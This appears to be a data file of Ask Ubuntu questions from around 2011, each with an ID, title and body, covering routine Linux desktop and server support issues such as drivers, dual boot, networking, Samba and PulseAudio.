60725	running ubuntu on vaio laptops	i am an ubuntu user ... and willing to buy a laptop for my undergraduate study , but the brand which i am likely to buy does not fall on ubuntu certified hardware . i am willing to buy vaio s series laptop . can anyone answer my following questions ? will ubuntu 11.10 run smoothly with full hardware compatibility on vaio s series laptop ? is there ubuntu support for vaio or vaio support for ubuntu ? googling on net found that there are some problems running ubuntu on vaio is that true ? if so will i get support from any community ?
60727	installed gnome 3 and the default theme looks horrible , how can i change ?	i just installed gnome 3 as in this question on a freshly installed 11.04 system . i do n't want to play with themes , but i 'm just looking for something decent . the default one is quite dull . i was using ubuntu 10.04 and the default was fine for me . how can i change to some other theme ? after removing gnome-accessibility-themes , it looks worse :
60729	how to pass answers to cli script via arguments ?	i 'm writing a cli script that asks a series of questions before doing a few things . how can i pass them as arguments so that i do n't have to keep entering them every time i want to test my script ? basically , it should pass 4 items to stdin , like `` text1 [ enter ] text2 [ enter ] text3 [ enter ] text4 [ enter ] '' automatically . yes , i could modify my script to actually read the shell arguments , but i do n't want to do it that way , since it 's supposed to run more like a wizard . looking for something like someprogram myscript arg1 arg2 arg3 arg4 or someprogram arg1 arg2 arg3 arg4 | myscript or something like that . is there such a program ?
60731	does ubuntu contain its own picture/video viewer/player ?	a photo of a photo among photos and videos on a homemade disc did not display on my dell inspiron b130 , but it was displayed on a computer with the ubuntu os .
60732	is there a ratio faker for bittorrent ?	it might be a bit unethical question , but i am in need of a ratio faker for bittorrent that works on ubuntu . which tool can you recommend ?
60741	physical storage of the kernel data	i have some question about physical storage of the kernel data in linux , i know that the upper 1 gb of the virtual memory of each process points to the same physical location , but this piece of the data has to be contiguous in physical media as in virtual memory ? does kernel data will take only 1 gb of the physical memory ? can some pages of the kernel data be swapped to the disk ( for example page tables , page global directory is always in physical memory and ca n't be swapped to disk as i understand ) edit what is the point to divide 32 bit virtual address into two levels ( level of page global directory - 10 bit , and second of page table - 10 bit ) and offset 12 bit , if it is not pagable what are the advantages of those two levels ?
60751	is it possible to have 32 bit libraries installed on a 64 bit system ?	i have the 32 bit shared libraries installed , yet i am still getting this error while trying to install pogoplug : ./pogoplugfs : error while loading shared libraries : libfuse.so.2 : wrong elf class : elfclass64 is there something else i need to do to get the program to load from the 32 bit libraries ? a similar question was asked earlier this year , but was not given any answer .
60752	how do i crop a video clip ?	i 've recorded a video using recordmydesktop , but have unfortunately chosen for capturing the whole screen ( 1600*896 ) instead of a small part with geometric 900*690 . how do i crop this video ? preferably in the editor i 'm using , kdenlive , to minimize quality loss . i 've tried the crop , pan & zoom and scale0tilt effects , modifying the pixel ratio , movie size inside project settings options without success . a step-by-step guide would be preferred or at least some hints .
60753	ubuntu one repeatedly crashes on android 2.2 ( zte blade )	whenever my android goes to sleep and disconnects the wifi to save power and then rewakes and reconnects to wifi , then my ubuntu-one-app is crashing with the following screen ( translated from german ) we are sorry . the application ubuntu one files ( process com.ubuntuone.android.files ) was terminated unexpectedly.try again . force kill - report app is upgraded regularly and a fix would be very useful .
60754	latest windows ubuntuone client not working correctly	i just installed the ubuntuone 1.0-beta client because i got the email about it today . i got all of the files i could see on the web site downloaded to my computer as expected . i dropped a new file in the folder and did a couple connect disconnect operations and the new client says `` file sync is up-to-date . '' i do not see that new file in the web interface . either it is not working or that up-to-date notice is in error . what is going on here ?
60755	how to use file expert to select a file for upload in ubuntu-one on android ?	when uploading files in u1 on android file expert is the first choice that u1 offers me to select the uploaded file and its my first choice too . but it does n't work . while i can select files i do n't know how to communicate this selection back to the u1-app . in general it would be very useful to share whole folders on my sdcard to the cloud like my android would be a desktop-machine .
60761	what is the correct way of removing a linux partition in a dual boot system ?	i have setup a dual boot system in my home computer with xp and ubuntu in that order . i want to know how to remove the linux partition without screwing up the bootloader ? i want to know this because i had this kind of setup before and to remove the linux partition i had formatted the linux partition from windows ( disk manager ) and was not able to boot back into xp , since the mbr was screwed up . i had to use an xp install cd to fix the mbr and etc . i know what i have done was stupid and i am eager to learn the correct way .
60763	how to install missing firmware for an creative labs audigy2 soundcard ?	i have an e-mu 1616m pci soundcard and recently made the switch from windows to ubuntu 11.04 ( natty ) . from a fresh install , everything works good except for a small error when i boot up that says it can not find the firmware for my soundcard . can anyone please help me learn what i need to do to get my soundcard working again ? output from dmesg | grep emu is : [ 22.083208 ] emu1010 : special config . [ 22.083289 ] emu1010 : emu_hana_id = 0x3f [ 22.083291 ] emu1010 : filename emu/emu1010b.fw testing [ 22.119132 ] firmware : emu/emu1010b.fw not found . err = -2 [ 22.119136 ] emu1010 : loading firmware file emu/emu1010b.fw failed ls /lib/firmware/emu says that the directory does not exist ! i am new to ubuntu and linux in general so i am not sure what other information i can provide . i found this link on installing the alsa driver for the e-mu 1616m pci , but i am worried i will wreck something trying to install from source and things will go all ubuntu crazy on me . some more system information : lspci | grep audio 04:07.0 multimedia audio controller : creative labs sb0400 audigy2 value and lshw *-multimedia unclaimed description : multimedia audio controller product : sb0400 audigy2 value vendor : creative labs physical id : 7 bus info : pci @ 0000:04:07.0 version : 00 width : 32 bits clock : 33mhz capabilities : cap_list configuration : latency=32 maxlatency=20 mingnt=2 resources : ioport : cf00 ( size=64 ) modinfo snd and modinfo soundcore both return results so they are there as well .
60764	top panel text/images corrupted at times	at times text in the top panel are missing . for example sometimes the time is cut off . other times , like right now , half of the username and the power icon are missing . any ideas on fixing this ? below is a screen shot of my username cut off and the power icon missing
60765	how do i add a directory to manpath or infopath ?	i think i understand the instructions given in how to add a directory to my path ? about adding directories to $ path . but i do n't understand how to add directories to $ manpath or $ infopath . also -- in googling around for help i have noticed that sometimes directions say export path=/usr/share/lib/something : $ path and sometimes they say export path= $ path : /usr/share/lib/something . which is it ?
60767	what application is good for note taking using tablets ( printable in a4 ) ?	i have a tablet and i currently use foxit pdf reader and annotate pdfs with the pencil tool . not very good as i can not overwrite what i have just done . eg . when i draw something , and want to add a few strokes to it , i cant as i will select the annotation instead . gimp/photoshop will fix that , but i ca n't have multiple pages in a same file can i ? what application will be good for this ? it need not work with pdf . just something that will allow me to scrible notes/draw diagrams quickly , also printable in a4 pages
60771	are there any plans to add paid software support to kubuntu 's muon software center ?	i was wondering if there are plans to add support for purchases in muon software center just like there is in ubuntu software center ? that would be handy , and as muon developer is part of kubuntu team , i think this makes sense ... but does anybody knows whether there are concrete plans ?
60772	main menu missing from ubuntu unity	the unity `` main menu '' in the upper left corner , which has been present for quite some time , just up and vanished . the launcher still works , as do its menus , but the main menu button is gone . how do i get it back ?
60775	how to automount a partition on boot / como hago para montar un particion al inicio del sistema ?	como hago para montar una particion al inicio del sistema ? antes en ubuntu 9.04 lo hacia con el paquete ntfs-config que me instalaba una aplicacion llamada `` herramienta de configuracion ntfs '' que simplimente realizaba 2 clicks y listo . pero esta herramienta ya no funciona en ubuntu 11.10 y de hecho creo que a partir de la version 10.10 no funciona bien : ( translated how do i auto mount a partition on boot ? before on ubuntu 9.04 i would auto mount a partition with a package called ntfs-config that would install a application called ntfs configuration tool . with this tool i would auto mount the partition with 2 clicks and done . but this tool does not work on ubuntu 11.10 and in fact i think it does not work well since 10.10 : (
60778	how can i convert an odt file to a pdf ?	does anyone know how to convert an odt file ( libreoffice ) to pdf ?
60782	how to reinstall ubuntu as part of dual boot ?	how do i completely reinstall ubuntu without affecting the windows partition ? the way i setup my laptop is like this : completely wiped everything using gparted from ubuntu cd partitioned the hdd to 3 partitions ( one for windows , one for ubuntu , one for storage ) installed windows 7 pro 64-bit installed ubuntu 10.04 lts 64-bit the reason why i want to reinstall is nothing works in ubuntu . no internet at all both ethernet , and wireless and when i figured out how to fix the wireless , there is no way to download drivers for the display so everything is just ugly and big . to make things more complicated , upgrading to 10.10 via update manager just gives me an error . the way i see it right now is i have to try to wipe 10.04 and just install 11.04 from scratch but i 'm not sure how to do that ? does anyone know ?
60784	execute a script after a vpn connection is started	i 'm starting a vpn connection using network manager . once the connection is established i have to change mtu in order it to work properly . for example : sudo ifconfig ppp0 mtu 777 it is very annoying to execute this command every time i open a vpn connection . is there any idea to create a script that would execute this command automatically once the connection is established ( ppp0 interface is up ) ?
60791	expanding /boot ... how to proceed ?	i just installed ub 10.04.2 lts -64bit on a new drive in my new laptop . did n't allocate enough space for /boot partition , and update manager choked on updating the kernel -- or at least i think that 's it ... ( grin ) i found and followed 2nd paragraph in [ can i expand my /boot without upsetting the system ? ] . i 'm now going to boot the livecd i used to install ( 64-bit ) and trust gparted to move partitions and increase size of sda1 to 1gb ( now 100mb ) . i 've done similar things with other distros , so i 'm hopeful this will work ; but how do i get my /boot partition set back to sda1 once i have it big enough ? will i need to : mount -t ext4 /dev/sda1 /mnt cp -ax /boot/ . /mnt gedit /etc/fstab ; un-comment '/boot partition ' line ( did n't remove ) -- then how do i deal with the 'new ' boot directory , from a live & mounted root filesystem , before re-running grub-install /dev/sda ? or , have i completely lost my mind to think this could be easily accomplished ? also , is it necessary to have /boot in a separate partition to be able to multi-boot several ( possibly 10 or more , eventually ) separate distros ? some day i 'll investigate virtual machines as i 'm sure they 're more efficient ( and why i got a dual-core amd ) , but for now , i 'm still hoping to customize an installation which survives a shut-down/ power-up cycle -- in less than seventy-something reinstalls ! ( grin ) some might even call me dangerous ... btw , i dropped the 'sudo ' part because i run one terminal window as root -- which might explain the huge number of reinstalls . oh , to be cut-apart by the sharp edge of a learning curve ! ( smile ) thanks so much , in advance ! -- tom
60796	sharing desktop with osx in lan	i 'd like to share ubuntu 11.10 desktop to my osx computer in the lan . what options there are ? i have been using vnc in the past , but i was wondering could i open x server connection directly from osx ? also looks like unity has horribly killed vnc support : https : //bugs.launchpad.net/unity/+bug/759349 also looks like xrdp is no go : https : //bugs.launchpad.net/ubuntu/+source/xrdp/+bug/846407
60798	what is the default behaviour of atime ?	i have an ubuntu 11.04 installation . the /home directory is on a partition which uses the ext4 filesystem . i have n't changed the default configuration so the filesystem is mounted at boot time with the defaults mount option . man mount explains which mount options the option defaults implies : rw , suid , dev , exec , auto , nouser , and async . i noticed that the access time ( atime ) of a file is n't updated every time i access a file ( for example with an editor or cat ) . i looked around in the man page of mount and found the following option : relatime : update inode access times relative to modify or change time . access time is only updated if the previous access time was earlier than the current modify or change time . this is exactly the behaviour which i observe on my system . but the relatime mount option is not enabled . is the behaviour described in the description of the relatime mount option the default behaviour of atime ? does this apply to all filesystems which support atime ?
60799	how do i install gournal ?	i am trying to install gournal and i ca n't because of a missing dependency which does n't appear to be in natty ? gournal : depends : libgnome2-print-perl but it is not installable
60800	toshiba wireless is blocked	i have the same problem , a 32 bits toshiba nb255 , it first had the windows 7 bu next i installed the ubuntu 11.04 . the wifi does not turn on . i used the following issues the commands rfkill unblock wlan0 , sudo ifconfig wlan0 down ; they were not able . by setting up the bios in advanced menu , the wireless communication sw in on , but it did not work also . neither the utilities toshiba nor utilities of ubuntu ( wicd , wifi radar ) . by using gedit to file group , nothing . by installing madwifi packet , nothing . by exporting the wifi driver from windows to ubuntu , by means of the ndiswrapper packet , neither . i put the current scripts of the ouput of the cli root @ zorrillo : ~ # rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : yes root @ zorrillo : ~ # sudo lspci | grep atheros 07:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) root @ zorrillo : ~ # root @ zorrillo : ~ # ifconfig -a eth0 link encap : ethernet direcciónhw 88 : ae:1d:47 : df : e1 activo difusión multicast mtu:1500 métrica:1 paquetes rx:0 errores:0 perdidos:0 overruns:0 frame:0 paquetes tx:0 errores:0 perdidos:0 overruns:0 carrier:0 colisiones:0 long.colatx:1000 bytes rx:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupción:43 dirección base : 0xe000 lo link encap : bucle local direc . inet:127.0.0.1 másc:255.0.0.0 dirección inet6 : : :1/128 alcance : anfitrión activo bucle funcionando mtu:16436 métrica:1 paquetes rx:8 errores:0 perdidos:0 overruns:0 frame:0 paquetes tx:8 errores:0 perdidos:0 overruns:0 carrier:0 colisiones:0 long.colatx:0 bytes rx:480 ( 480.0 b ) tx bytes:480 ( 480.0 b ) ppp0 link encap : protocolo punto a punto direc . inet:189.203.115.236 p-t-p:192.168.226.1 másc:255.255.255.255 activo punto a punto funcionando noarp multicast mtu:1500 métrica:1 paquetes rx:6384 errores:30 perdidos:0 overruns:0 frame:0 paquetes tx:6893 errores:0 perdidos:0 overruns:0 carrier:0 colisiones:0 long.colatx:3 bytes rx:5473081 ( 5.4 mb ) tx bytes:974316 ( 974.3 kb ) wlan0 link encap : ethernet direcciónhw 00:26:4d : c3 : d0:44 difusión multicast mtu:1500 métrica:1 paquetes rx:0 errores:0 perdidos:0 overruns:0 frame:0 paquetes tx:0 errores:0 perdidos:0 overruns:0 carrier:0 colisiones:0 long.colatx:1000 bytes rx:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) note.-it is logical all the counters are cero if the wireless device is down root @ zorrillo : /home/zorrillo/descargas/802bga # ifconfig wlan0 up siocsifflags : operation not possible due to rf-kill root @ zorrillo : /home/zorrillo/descargas/802bga # it would seem the wireless switching does not react with whichever ubuntu 11.04 command ( i hope to be wrong ) . the target remains the same , in order of the scripts above . i am worried , i have tried to find any answer for days and nights . toshiba does not supply drivers or soft support for linux , marketing of course . i only see the device is up by protocols and down phisically , my question is , is it possible to enable or not shutdown physically the device ? , because in the toshiba model nb255 the wifi is not set up/down bye means of a physical switch , but by means a combination of fn + f8 ( only for windows 7 , no one more ) , is there one possibility to configure the hot keys in ubuntu ?
60803	should i upgrade or fresh installation ?	ubuntu 11.10 ( oneiric ocelot ) will be out soon . should i upgrade it using update manager or using fresh installation ? which one is better ? what the pros & cons upgrading using update manager ?
60804	changing panel width & color	after increasing the width of my panel , i got something like how can i fix this color issue ?
60805	how to install vpnpptp ?	in manual it seems obvious but i do n't understand how to run this application . the full name of file is vpnpptp_setup-en-linux-x86_64-install.tar.gz inside the archive it has ready to run application . link to application . so , how to install vpnpptp on ubuntu 11.04 ? thanks
60806	ubuntu classic , possible to have just big icons like in windows 7 ?	i like how in windows 7 , only icons are shown in the taskbar/panel . is it possible in ubuntu ( 11.04 ) ? also i suppose it will be great to be able to group windows from the same program into 1 icon and have some sort of preview , also like in windows 7 or even unity with preview enabled
60812	when upgrading , is there an easy way to remove old default packages ?	i 've just upgraded to 11.10 beta using update-manager and all went well . however , the install process leaves installed default packages from the previous version that i no longer want ( gdm , evolution etc . ) i 've generated a list of additional packages i have installed via a method similar to http : //www.faqoverflow.com/unix/3595.html however my list contains lots of packages i installed and do want to keep - is there an easy way to just remove the deprecated default packages ?
60814	change keybinding for window previews	something ( a compiz plugin ? ) shows a preview of all the windows when i hit shift+alt+up . like this : i ca n't find the key binding in ccsm , what provides this feature , and where can i change the key binding ?
60816	ubuntu buttons theme wo n't change	when i try any theme other than ambiance or equinox buttons ( only when maximized ) are from these two themes . i ca n't change them to be from my current theme : / is there any solution ?
60818	touch pad scrolling and multi-gesture does n't work on an acer aspire 4741g	i am new to ubuntu ( 11.04 ) and i have an acer aspire 4741g when i worked on win-7 , my touch pad had vertical scrolling and multi-gesture , both scrolling and multi-gesture are n't working on ubuntu . how can i get it to work ?
60819	first time sync of documents etc	i have just started ubuntu one free and also signed up to ubuntu one music streaming . i have set my documents , music and pictures folders to sync with ubuntu one . all the folders are marked as synced , but not all the files in them have been synced . how do i ( a ) check was has been properly synced and ( b ) make sure every file in each folder is synced ?
60823	how to restore network-manager ?	i 've broken network-manager trying to compile it from source , the applet no longer shows in the panel and i ca n't connect to any of my ( wireless ) networks . how might i restore it ? i 've tried reinstalling the network-manager packages from main repository but had no luck recreating the applet icon/indicator .
60824	how to use my line-in or mic-in as an output line ?	i have tried using alsamixer but i ca n't seem to figure out how to make it do this or if it is capable of doing this at all . ps : this is possible on my hardware since i am using realtek 's program on windows doing just that using my line-in .
60826	where is the default folder for apps ?	i am relatively new to the linux world . i use osx at home and windows at work . in those worlds , there is a default folder for applications ( c : \program files , /applications ) . is there any such directory in ubuntu ? i understand that this is not very important and any location in the file system should be ok , but was just wondering whether there are such standard locations ( i think there would be one ) . for instance where is firefox or libre office ( that are installed by default ) ? got this question when i was trying to install eclipse . downloaded the zip , and was wondering ...
60828	how to host a tiny restful application written in java/c # /python ?	i want to write a tiny restful server in some language that can run on ubuntu 10.04 , but i have no idea how to host it . currently i have a vps at linode.com ( disclaimer : referral code ) with nginx , i might have apache running as well but not configured correctly , running that serves some public websites ( wordpress ) . does that mean port 80 is taken ? how should i host my application to be able to handle urls like http : //myip/user/zolomon for instance ? do i have to communicate with nginx in some way , since i suppose it 's what handles the url ?
60835	how do i access shared folders on ubuntu server from mac os ?	i have an old dell desktop running ubuntu 11.04 , i also have samba installed on it . i 'm trying to access the shared folders on the ubuntu machine from my mac , so i go into 'finder ' , click on 'go ' and 'connect to server ' . i type in the ip address of the ubuntu machine smb : //xxx.xxx.x.xx and click connect , i can then see the list of shared folders from the ubuntu machine so i know its making a connection . but when i access the 'music ' folder i get an error message stating : there was an error connecting to the server `` xxx.xxx.x.xx '' . check the server name or ip address , and try again . any thoughts anyone ? edit i have a external hard drive attached to the server , and the folders i 'm trying to access are located on that external hard drive . the location of the folder is /media/hd-celu2/test , so i think the path from finder should be smb : //xxx.xxx.x.xx/media/hd-celu2/test , but having tested this , i 'm still not getting in . p.s . i 'm using samba as i have a windows machine on my home network as well .
60836	what network mapping tools are available ?	what network mapping tools are available ?
60837	record a programs output with pulseaudio	i would like to record an output of a program with pulseaudio using command line/bash script . it is important not to record every output of the sound card , but only the one of one specific program . i thought i would have to create a new null-sink and than move the programs output to this new sink . than tell parec to use this specific monitor to record . the first step would be something like this : pactl load-module module-null-sink sink_name=steam but how to move the programs output now to this sink ? and how to record the specific sink with a bash script ?
60840	weird viewing in citrix receiver ( ati card )	in a ubuntu natty desktop pc i connect to a ms windows machine via citrix receiver , sometimes window looks weird ( has blank areas , yo have to switch to another window outside citrix and come back to see it right ) . i tried wfcmgr changing window color settings but no luck . i think it 's related with graphics card ( ati ) , changing to ubuntu classic with no effects ( no unity , no compiz ) solves the problem but i do n't want to stay in ubuntu classic . now i 'm using unity 2d and works fine for me so seems a compiz related problem .
60846	how do i upgrade to the latest version of shotwell ?	i am running ubuntu 10.10 , and am trying to upgrade shotwell to the latest version ( 0.11.1 ) . i 've been trying to follow the instructions on the shotwell installation page for building from source but i have run into a problem . when i run make , i get the following message : requested 'gstreamer-pbutils-0.10 > = 0.10.32 ' but version of gstreamer base utils library is 0.10.30 make : *** [ pkgcheck ] error 1 it seems like the problem is that i need a newer version of gstreamer , but i 'm not sure . what should i do from this point ?
60847	ipod not mounting	tried to connect my ipod , but got this message : error mounting : mount : wrong fs type , bad option , bad superblock on /dev/sdb2 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so have seen links to this here , but beeing rather green , i do n't understand much . https : //bugs.launchpad.net/ubuntu/+source/util-linux/+bug/734883 what do i do now ? the dmesg|tail says [ 2819.709437 ] sd 6:0:0:0 : [ sdb ] 3901376 4096-byte logical blocks : ( 15.9 gb/14.8 gib ) [ 2819.710161 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through [ 2819.735294 ] sdb : [ mac ] sdb1 sdb2 [ 2819.738060 ] sd 6:0:0:0 : [ sdb ] 3901376 4096-byte logical blocks : ( 15.9 gb/14.8 gib ) [ 2819.738671 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through [ 2819.738688 ] sd 6:0:0:0 : [ sdb ] attached scsi removable disk [ 2820.420130 ] sd 6:0:0:0 : [ sdb ] bad block number requested [ 2820.420167 ] hfs : unable to find hfs+ superblock [ 2820.612140 ] sd 6:0:0:0 : [ sdb ] bad block number requested [ 2820.612191 ] hfs : unable to find hfs+ superblock
60850	how good are the open-source nvidia drivers ( nouveau ) ?	i learned that ubuntu 11.10 would come with open-source nvidia drivers by default . i have an nvidia 9600m gt graphics card and have always had to install the proprietary nvidia drivers after installing ubuntu . i would love to have it pre-installed in form of this open-source driver . however , i wonder if it is on par , in terms of performance with 3d intensive applications such as games with its proprietary counterpart
60852	.vob file not compatible with anything i try	i recently bought two dvd movies at the local store , and , trying to watch the movie on my computer , it doesnâ´t work . all files are in the .vob format . i 've looked at other people having similar issues but mine is a bit different . i just put in the dvd and play it but it doesnt work . i have all kinds of players , from vlc to dragon player and totem and several others . please do n't give me any programming tips , i ca n't program . ( which is why i use ubuntu , ubuntu claiming to be `` linux for human beings '' i do n't know what a directory or root is , i 'm a noob . i just want to watch a movie .
60858	gnome/nautilus does not remember individual folder 's size/position ?	i am using ubuntu 11.04 and i have noticed that gnome/nautilus remembers a `` global '' setting for size/position using the last window open instead of remembering an individual size/position for each folder . also , this applies for some applications as well . i find this a real productivity killer and i think its one of the most basic features of a window manager . funny thing is , that windows had this feature for a long time now . i have tried devilspie but i find it would be really time wasting to configure every folder that way . is there any fix for this issue , if not what window manager would you suggest me ?
60859	japanese anthy ( ibus ) not working for skype 2.2 beta ?	i 've been looking around for a fix to the japanese anthy ( ibus ) fix for skype 2.2 beta for a few days now and i 've been unable to find a fix for it . i 'm a new user of linux and my current setup is ubuntu 11.04 . so far the only programs that i have tried anthy with and worked are firefox , gedit and empathy . i came across this link which was similar to my case but different in terms of distro http : //code.google.com/p/ibus/issues/detail ? id=613 i have tried the fix but it did n't seem to fix the issue . if anyone has any ideas on how to fix it or the slightest info on what to update/get please feel free to enlighten me .
60863	what is exact purpose to have optimized libc6 ?	on ubuntu 10.04 i tried to run 3rd party commercial application [ written in c ] ( i did not have sources for it ) . it was crashing constantly without special reason ( segmentation fault ) . an error looked like was related to the threading library . i did not have any problems on rhel 5.7 so i decided to remove package libc6-686 . this helped immediately and crashes stopped . i understand that now i use regular libc6 on the systems . how big non optimized libc6 could bring performance degradation to the rest of the system ?
60864	how do i bind 'menu key ' to right 'win key ' ?	i have a keyboard with two `` win '' keys but without `` menu '' key . i 'd like to bind my right win as menu . i tried do used xev in terminal and get keycode for .xmodmap file but ca n't take code of right win . just always open system menu of ubuntu . how i can do it ?
60868	pros and cons of lts vs. normal release	i installed ubuntu 10.04 ( lts ) today . at the moment , i do not wish to upgrade to 10.10 nor 11.04 because i 'm not a big fan of unity and the new gui . ( i 'm aware of the gnome classic option in 11.04 ) since i 'm using a lts version , rest assured i will be receiving updates to ubuntu until april 2013 . so my question is what am i missing by using an lts ? what kind of updates lts version receives compared to the normal release ? are they just security updates ?
60870	udp tuning ubuntu - how to ?	i 'm having some lags with my server running ubuntu 10.04 on my udp packets . what should i do to change the settings set for the udp packets ? i think the problem is there . on my /proc/sys/net/ipv4/udp_mem i have 137088 182784 274176 udp_rmem_min : 4096 udp_wmem_min : 4096 /proc/sys/net/core/rmem_max - 131071 /proc/sys/net/core/rmem_default - 124928 /proc/sys/net/core/wmem_max - 131071 /proc/sys/net/core/wmem_default - 124928 i 'm sending 30 packets every second from the client to the server and from the server to the client . they are all coming in a delay when there are a lot of users connected .
60872	why do a lot of programs crash in segmentation fault ?	for a few days , a lot of programs do not launch properly . this includes skype , oracle vm virtualbox , scilab , boinc , lăve , omg ! words ! and a little java program i downloaded from the web ( remotedroid ) . when i launch them from the terminal , i get the same error : segmentation fault . i can not figure out which is the recent change i made on my computer that is the origin of those errors ; is it because i changed my keyboard-layout ? or because i installed a lot of programs for developers ? notice that it is a general problem , not for just one only application . moreover , since the two first are closed source , i will not be able to compile them .
60873	a great python ide for ubuntu	i want to develop python apps in ubuntu , and i 'm tired of working with gedit one time and another . so i 'm trying to find a great python ide ( a true ide , not just a syntax-highlighting editor ) on the ubuntu repositories . which one do you recommend me ?
60877	choppy video with hd -- is there an easy way to downsample or lower the quality so that my videos will play correctly ?	i have a somewhat older computer , and it 's fine with most things , but on super high-res video it 's choppy and the cpu 's at 100 % . should i downsample these videos , or is there a setting that i can use to make them play without stopping ?
60881	caldav interface for ubuntu one	i am currently operating my own caldav server . i am running http : //trac.calendarserver.org/ . however i am thinking about using ubuntu one but for that i want an open protocol which allows my mobile phone to sync with it and is integrated into many applications on many platforms . i could not find if/when this feature is planned for ubuntu one ? btw . the calendarserver is the implementation powering apple 's me.com or in the future icloud.com . the other option is http : //www.davical.org/ .
60884	gnome shell theme displays orange title bars	i 've upgraded from 11.04 to 11.10 beta and installed gnome shell and logged on with the gnome shell session . my window title bars are orange like this : any way to fix ?
60886	what files can i delete to avoid repeating the python libraries ?	i installed sage mathematics from binary because there was no package for it in synaptic . from reading on the web i learned that sage brings its own python libraries rather than using the ones ubuntu / synaptic has already installed . i 'm getting low on hard disk space -- what can/should i delete ? or how should i rejigger my libraries / system to avoid duplicating ( gigabytes ) worth of libraries ? btw , i 'm having a similar problem with texlive-full -- i first downloaded the package in synaptic , then realised it was outdated , then downloaded the iso -- and now i think i have three or four copies of latex on my drive .
60887	not able to install ldapclient on a non-internet connected pc	for past couple of days am trying to install ldapclient in ubuntu 10.10 , but no luck . can anyone point me to the exact packages i need to download and install , i have tried the same so may times but failed , so please help . one important thing is that i dont have any internet connection to this desktop because of security reasons , so i need to download those packages and install manually .
60889	how to have a openldap multi master replication setup ?	this is the setup i would like to have . ldap clients | ________________|________________ / \ |___________loadbalancer1___________| | | | | | | ldapserver1 ldapserver2 ldapserver3 my challenge is i never did this kind of architecture before , so would like to know from lb prospective , how to configure it like say i have to create a dns fqdn e.g `` ldapserver.example.com '' and then use this as a floating ip/hostname for the 3 ldap servers in the backend ? or what should be done ? the network team will do the setup but i need to tell them what to do . i would also like to configure ldaps , so how to create the certificate i mean what to provide in common name or how to create a certificate which can be shared across the servers , am using openssl ? the setup wiould be a multi-master replication .
60890	jackd does not work with winesasio and fl studio	i 'm trying to get fl studio to work using wineasio and jackd , but so far : no luck . the problem lies with jackd and pulseaudio . i can start jackd and have pulseaudio piped through it , but no sound comes out from it . from any application . does anyone have any pointers as to how jackd has to be set up ?
60891	fix $ path to work with ssh	i 'm running ubuntu 11.04 . suddenly my server stopped to recognize any commands : ssh lisv22 @ chusmix.com password : -bash-3.2 $ sudo -bash : sudo : command not found i think this has to due with a problem with $ path : -bash-3.2 $ echo $ path /usr/kerberos/bin : /usr/local/bin : /bin : /usr/bin how can i fix this issue to make commands work again in ssh ? also is this a problem with my server or my system ? if i install debian and try again from there will i be able to run commands ? any info about the issue will be accepted . thanks
60894	use certain values for x and y axis in calc	i 'd like to create a chart with the wavelength as x-values and the corresponding voltage as y-values . i tried in vain for quite some time , could you please help me ? 位/nm 580 546 436 u/v 0,75 0,85 1,25
60898	how do i completely remove ekiga ?	how do i completely remove ekiga via sudo apt-get remove -- purge seems to leave some information when i re-install ekiga . can i rm -rvf even tho ekiga is not just in the home file but in the gconf > apps file ? the reason is that i had added two profiles ( a & b ) but after trying remove -- purge the other profile ( b ) is still there but not visible from computer 1 ... i installed ekiga on another ubuntu computer 2 with ( b ) profile . when i try message ( b ) from computer 1 it goes nowhere because it apparently is sending it to profile ( a ) on computer 1 . however sending from comp 2 with profile ( b ) to comp 1 and profile ( a ) it goes through . so it is apparent comp 1 has profiles ( a ) and ( b ) even after remove -- purge .
60902	letters choppy on google earth	i installed google earth and it is basically working , but the letters are choppy . why are the letters choppy ?
60904	indicators & notification area size inconsistent	i have resized my panel to 36px . i noticed that the sizing of the indicators & notication area is in consistant as shown below from the left : indicators notification area ( pidgin ) drawer ( the house icon ) clock separators excluded is there a way to reduce the spacing of the indicators and/or reduce the size of the notification icon ( plus the drawer perhaps too ) ?
60913	how to open/change config file of tvmobili in terminal	i must make some changes in my config file for my media server ; tvmobili but i do n't know where to find it , what commands must i use ?
60919	can i adjust the timeout of the filter box in gtk ?	i 'm running ubuntu 11.10 and i was wondering if somebody knows how to modify the timeout in gtk3 for the small `` filter '' box that appears when you start typing in a list / nautilus folder ( in 2.x it stays up a lot , in 3.0 it acts more like kde in the way that you can almost only have 1 letter a a time ) . update it 's working nicely since the final release .
60923	when is network-manager-openvpn going to be updated to the 0.9 version ?	since bug 274930 implemented added functionalities in network manager regarding openvpn , the network-manager-openvpn plugin needs to be updated to 0.9 version to benefit from those improvements . at the moment , with the 0.899 version it is impossible to connect to a openvpn server ; the following is generated in the syslog file : sep 11 09:25:38 abc networkmanager [ 1594 ] : < info > starting vpn service 'openvpn ' ... sep 11 09:25:38 abc networkmanager [ 1594 ] : < info > vpn service 'openvpn ' started ( org.freedesktop.networkmanager.openvpn ) , pid 5083 sep 11 09:25:38 abc networkmanager [ 1594 ] : < info > vpn service 'openvpn ' appeared ; activating connections sep 11 09:25:38 abc networkmanager [ 1594 ] : < info > vpn plugin state changed : 1 sep 11 09:25:38 abc networkmanager [ 1594 ] : < info > vpn plugin state changed : 3 sep 11 09:25:38 abc networkmanager [ 1594 ] : < info > vpn connection 'xyz ' ( connect ) reply received . sep 11 09:25:38 abc networkmanager [ 1594 ] : < warn > vpn connection 'xyz ' failed to connect : 'property 'user-name ' invalid or not supported ' . sep 11 09:25:38 abc networkmanager [ 1594 ] : < warn > error disconnecting vpn : could not process the request because no vpn connection was active . sep 11 09:25:38 abc networkmanager [ 1594 ] : < info > policy set 'auto eth0 ' ( eth0 ) as default for ipv4 routing and dns . sep 11 09:25:43 abc networkmanager [ 1594 ] : < info > vpn service 'openvpn ' disappeared when will it be updated ?
60929	any accounting software especially coded for ubuntu	are there any accounting application/software ( medium to large scale enterprise level ) especially coded for ubuntu .
60933	how to switch between network interfaces from console ?	i 've installed debian in my virtualbox ( my host os is ubuntu ) . and there i configured two network interfaces : eth0 as nat , and eth1 as bridge . nat i need to have access to the internet in virtual os , but bridge i need because i want this virtual os to be a part of my local network . how to switch from these network interfaces ? for example now i use eth0 ( nat ) , but some time later i need to turn off eth0 and turn on eth1 . p.s . there is no desktop environment in guest os ( debian ) , so i need to do this in terminal . thanks in advance .
